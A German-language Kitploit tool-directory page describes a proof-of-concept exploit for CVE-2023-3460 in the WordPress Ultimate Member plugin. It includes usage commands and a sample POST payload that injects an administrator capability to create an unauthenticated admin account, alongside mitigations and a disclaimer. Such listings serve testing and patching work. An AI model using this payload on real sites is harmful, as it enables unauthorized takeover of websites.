Skip to content
KitploitKITPLOIT
ToolsBlog
Einreichen
ToolsBlog
Einreichen

Hacking-, PenTest- und Cybersicherheits-Tools für Ihr Sicherheitsarsenal!

Kitploit ist ein Verzeichnis von Hacking-, Cybersicherheits- und Pentesting-Tools. Entdecken Sie die neuesten Projekt-Updates, um Schwachstellen zu finden, Systeme zu analysieren, Tests zu automatisieren und Ihre Sicherheit zu stärken.

··Feeds·Kontakt·Datenschutz·© 2026 Kitploit

Tool-Verzeichnis

Kategorien

Alle Kategorien anzeigen
Loading categories
CVE-2023-3460 — Proof-of-Concept-Exploit für CVE-2023-3460, eine Privilegieneskalations-Schwachstelle im WordPress Ultimate Member Plugin. Erstellt ein Admin-Konto über eine manipulierte Registrierungsanfrage. Nur für autorisierte Tests. | Kitploit
Tools/GitHubGitHub/gurjotexpert/cve-2023-3460
Privilege EscalationSchwachstellenanalyseExploitationWebanwendungs-ExploitationWebsicherheitPenetrationstestsLernen & Bildung
GitHubgurjotexpert/cve-2023-3460

CVE-2023-3460

Proof-of-Concept-Exploit für CVE-2023-3460, eine Privilegieneskalations-Schwachstelle im WordPress Ultimate Member Plugin. Erstellt ein Admin-Konto über eine manipulierte Registrierungsanfrage. Nur für autorisierte Tests.

Repository anzeigen
11vor 1 JahrNoch nicht geprüft

Beliebteste

Alle anzeigen →

Entdecken Sie die meistgenutzten Tools unserer Community.

Alle Tools erkunden

Durchsuchen Sie unsere Tool-Sammlung

Alle Tools anzeigen →
Teilen

🚨 CVE-2023-3460 - Exploit zur Privilegienerweiterung für WordPress Ultimate Member

Dies ist ein Proof-of-Concept-Exploit (PoC) für CVE-2023-3460, eine kritische Schwachstelle im WordPress-Plugin Ultimate Member. Er ermöglicht nicht authentifizierten Benutzern, ihre Privilegien durch das Erstellen einer bösartigen Registrierungsanfrage auf Administrator zu erweitern.

🔥 Auswirkungen: Vollständige Kompromittierung der Website durch die Erstellung nicht autorisierter Administratorkonten.


📌 Details zur Schwachstelle

  • Betroffenes Plugin: Ultimate Member
  • Betroffene Versionen: ≤ 2.6.6
  • Behobene Version: 2.6.7
  • Exploit-Typ: Privilegienerweiterung durch Registrierungsmissbrauch
  • Erforderliche Authentifizierung: ❌ Nein
  • CVE: CVE-2023-3460

⚙️ Voraussetzungen

  • Python 3
  • requests-Bibliothek
  • urllib3-Bibliothek
  • beautifulsoup4-Bibliothek

Abhängigkeiten installieren:

root@kitploit:~
pip3 install requests urllib3 beautifulsoup4

🧪 Nutzung des Exploits

root@kitploit:~
python3 CVE-2023-3460.py -t <TARGET_URL> -u <NEW_USERNAME> -p <NEW_PASSWORD> 

✅ Beispiel:

root@kitploit:~
python3 CVE-2023-3460.py -t http://localhost/register/ -u pwnadmin -p Pass@123 

📥 Funktionen des Exploit-Skripts

  • Ruft das CSRF-Nonce (_wpnonce) von der Registrierungsseite ab
  • Umgeht die Formularvalidierung
  • Injiziert wp_capabilities mit der Rolle administrator
  • Erstellt ohne Authentifizierung einen neuen Admin-Benutzer

🔐 Beispiel-Exploit-Payload

root@kitploit:~
POST /register/ HTTP/1.1
Content-Type: application/x-www-form-urlencoded

user_login=pwnadmin&
[email protected]&
user_password=Pass@123&
wp_càpabilities[administrator]=1&
_um_nonce=<nonce_value>

🛡️ Gegenmaßnahmen

  • Aktualisieren Sie das Plugin Ultimate Member auf v2.6.7 oder höher
  • Deaktivieren Sie die offene Registrierung, falls sie nicht benötigt wird
  • Überwachen Sie die Protokolle der Benutzererstellung auf verdächtige Aktivitäten

📚 Referenzen

  • 🔗 Patchstack Advisory
  • 🔗 CVE-2023-3460 bei NVD

⚠️ Haftungsausschluss

Dieses Skript wird ausschließlich für Bildungs- und autorisierte Testzwecke bereitgestellt. Die unbefugte Ausnutzung von Systemen ist illegal und unethisch. Verwenden Sie es nur auf Systemen, die Ihnen gehören oder für deren Tests Sie eine Genehmigung haben.


👨‍💻 Autor

  • 💀 [GURJOT SINGH]
  • 🔒 [Linkdin: https://in.linkedin.com/in/gurjot-singh-8198b3220]
Tool herunterladen